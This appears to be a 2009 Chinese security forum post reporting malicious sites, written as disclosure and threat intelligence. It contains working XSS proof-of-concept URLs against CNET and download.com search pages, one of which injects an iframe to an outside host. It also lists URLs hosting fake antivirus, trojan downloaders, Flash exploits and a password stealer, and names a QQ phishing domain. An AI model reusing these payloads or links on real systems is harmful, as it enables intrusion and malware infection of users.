|
|
恶意网站信息来源:
蔚蓝彩虹,luisvivian (http://www.formynet.cn)
恶意网站分析由: http://www.mfhy8.cn(本站以中马)
[size=+0]发现日期:2009-01-03 [td]漏洞风险(Exploits/Risk Related) | 网站
[td]风险信息
| 1, download.com
[Title:CNET Download]
▁▂▃▄▅▆▇
未修复
(XSS)
*发现者:
Safelab
[td]测试地址1:
>>>>http://www.download.com/1770-20_4-0.html?query=%3C%2Fscript%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&tag=srch&searchtype=downloads&filterName=platform%3DWindows&filter=platform%3DWindows 打开后将显示2个对话框,内容为“5”(请复制以上蓝色地址到地址栏测试)
测试地址2:
>>>>http://www.download.com/1770-20_4-0.html?query=%3C%2Fscript%3E%3Ciframe+src%3D%22http%3A%2F%2Fsafelab.spaces.live.com%22%3E%3C%2Fiframe%3E&tag=srch&searchtype=downloads&filterName=platform%3DWindows&filter=platform%3DWindows
打开后将显示2个默认大小的Iframe,指向本博客(请复制以上蓝色地址到地址栏测试)
Alexa Rank: 133 ★
Google PageRank: 
概述:一个流量巨大的下载站点,恶意构造的关键字可被用作非法用途。
威胁度: 6 (高)
分析: Safelab.spaces.live.com
| 2, cnet.com
[Title:CNET]
▁▂▃▄▅▆▇
未修复
(XSS)
*发现者:
Safelab
[td]测试地址1:
>>>>http://www.cnet.com/1770-5_1-0.html?query=%3C%2Fscript%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&tag=srch 打开后将显示1个对话框,内容为“5”(请复制以上蓝色地址到地址栏测试)
测试地址2:
>>>>http://www.cnet.com/1770-5_1-0.html?query=%3C%2Fscript%3E%3Ciframe+src%3D%22http%3A%2F%2Fsafelab.spaces.live.com%22%3E%3C%2Fiframe%3E&tag=srch
打开后将显示1个默认大小的Iframe,指向本博客(请复制以上蓝色地址到地址栏测试)
Alexa Rank: 158 ★
Google PageRank:
概述:一个流量巨大的资讯站点,恶意构造的关键字可被用作非法用途。
威胁度: 6 (高)
分析: Safelab.spaces.live.com
|
[size=+0]解密日期:2009-01-03 [td]木马相关(Trojan/Malware Related) | 网站
[td]解密信息
| GROUP 1 MULTIPLE SITES
[欺骗][风险][死循环(对话框)]
(10x)
[td]>http://4scanav.com
>http://in4is.com
>http://in4sk.com
>http://in5is.com
>http://pro4scan.com
>http://scan4pro.com
>http://scan5av.com
>http://scanner4.com
>http://scan4new.com/22/?uid=12900
>[Spy.Backdoor.InternetAV (FakeGuard)] http://scan4new.com/download/install.php **
>[Downloaded by install.php] http://in4is.com/download/file.exe **
>[Redirect by file.exe] http://in4is.com/download/InternetAntivirusPro.exe **
>http://in4co.com/cki.php?uid=12900 * * in4co.com通过w=1/h=1的iframe加载,内容为空,但可能为今后添加恶意代码用。
** InternetAV不仅是欺骗程序,也是一个间谍程序,会后台发送感染机器的数据到远程计算机。
| 11, 97haowyt.com
[转接]
12, jggddf.cn
[转接]
13, opmm8899.cn
[漏洞][木马]
14, d.ko546.com
[木马]
[td]关于:hxxp://97.haowyt.com/js/baidu.js解密的日志(全体输出- 24):
Level 0>http://97.haowyt.com/js/baidu.js
Level 1>http://www.jggddf.cn/wyfs/5.htm
Level 2>http://www.opmm8899.cn/a321/fxx.htm
Level 3>http://www.opmm8899.cn/a1/real.html
Level 3>http://www.opmm8899.cn/a1/real.htm
Level 3>http://www.opmm8899.cn/a1/glworld.html
Level 3>http://www.opmm8899.cn/a1/bfyy.htm
Level 3>http://www.opmm8899.cn/a1/no.htm
Level 4>[TR.Downloader]http://d.ko546.com/new/a1.css ●
Level 3>http://www.opmm8899.cn/a1/sina.htm
Level 3>http://www.opmm8899.cn/a1/ms06014.htm
Level 3>http://www.opmm8899.cn/a1/ss.htm
Level 3>http://www.opmm8899.cn/a321/fx.htm
Level 4>http://www.opmm8899.cn/a321/flink.html
Level 5>[EXP.Flash FF Ver9.0016]http://www.opmm8899.cn/a321/f16.swf ●
Level 5>[EXP.Flash FF Ver9.0028]http://www.opmm8899.cn/a321/f28.swf ●
Level 5>http://www.opmm8899.cn/a321/f45.swf ●
Level 5>http://www.opmm8899.cn/a321/f47.swf ●
Level 5>http://www.opmm8899.cn/a321/f64.swf ●
Level 5>[EXP.Flash FF Ver9.0115]http://www.opmm8899.cn/a321/f115.swf ●
Level 4>http://www.opmm8899.cn/a321/ilink.html
Level 5>[EXP.Flash IE Ver9.0028]http://www.opmm8899.cn/a321/i28.swf ●
Level 5>http://www.opmm8899.cn/a321/i16.swf ●
Level 5>http://www.opmm8899.cn/a321/i45.swf ●
日志由 Redoce1.6第14次修正版于 2009-1-3 18:32:16 生成。
| 15, ads.20-12.cn
[转接]
16, mmmbbcc.cn
[漏洞]
17, 8877gggg.cn
[木马]
18, qqq.vvvqqvvv.cn
[漏洞]
19, ak136.justcctv5.cn
[漏洞]
20, ak136.justcctv8.cn
[木马]
[td]>http://ads.20-12.cn/ad/ad.js?id=z
>http://mmmbbcc.cn/1/love2008.htm
>[TR.PSW]http://8877gggg.cn/1.exe
>http://qqq.vvvqqvvv.cn/cctv18w/cc.htm
>http://ak136.justcctv5.cn:88/just1202/xxoo.htm
>[TR.Downloader]http://ak136.justcctv8.cn/avast/ccc.exe |
[td]
|
[td]
|
[td]
|
[td]
|
[td]
|
[size=+0]解密日期:2009-01-03 [td]钓鱼/虚假广告相关(Phishing/FakeAdwareRelated) | 网站
[td]钓鱼情况
| 1, qq2009ckp.cn
[钓鱼: 腾讯 qq.com]
[td]>http://www.qq2009ckp.cn/
|
[td]
|
[td]
|
[td]
|
[td]
|
[td]
|
[td]
|
[td]
|
声明:
危险性:文中列于木马相关中的均为恶意木马站点,请勿直接点击(显示可执行文件的链接仅为病毒收集人员下载提供方便)。列于钓鱼相关中的网站均为钓鱼站或虚假的广告站点,请勿相信这些网站的任何内容。
利用方式:所有链接仅供爱好者或安全研究人员做屏蔽、入库或上报安全软件厂商用,禁止一切非法的用途(包括复制,修改,无备注公布等一切传播行为)。
时效性:由于木马页面或钓鱼页面失效速度快,故可能部分网站经过一段时间会出现无法访问的情况。 |
|
发表于 2009-1-4 00:21:47
发表于 2009-1-4 10:15:50